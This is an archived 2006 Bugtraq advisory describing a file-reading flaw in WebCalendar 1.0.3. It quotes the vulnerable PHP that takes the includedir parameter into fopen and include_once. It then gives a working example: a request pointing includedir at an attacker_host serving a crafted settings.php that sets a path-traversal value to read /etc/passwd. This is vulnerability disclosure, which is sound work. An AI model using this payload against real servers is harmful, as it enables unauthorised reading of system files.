lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060530183112.15986.qmail@securityfocus.com>
Date: 30 May 2006 18:31:12 -0000
From: socsam@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: WebCalendar-1.0.3 reading of any files


Version:    WebCalendar-1.0.3

Type:       Reading of any files

Description:
-----------------------------
includes/config.php:
line  64

if ( ! empty ( $includedir ) ) 
  $fd = @fopen ( "$includedir/settings.php", "rb", true );

......

while ( ! feof ( $fd ) ) {
  $data .= fgets ( $fd, 4096 );
}

$configLines = explode ( "\n", $data );

for ( $n = 0; $n < count ( $configLines ); $n++ ) {
......
    $settings[$matches[1]] = $matches[2];
......

$user_inc = $settings['user_inc'];
......

includes/init.php
include_once "includes/$user_inc";

Example:
---------------------------------------
index.php?includedir=http://attacker_host
where in attacker_host exists file settings.php , which content

"
<?php

    echo '<?php
# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300
Unimportant variables can be taken from original settings.php
user_inc: ../../../../../../../../../../../../../../../../etc/passwd
# end settings.php
?>';

?> 
"

Requirements
register_globals = On;


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ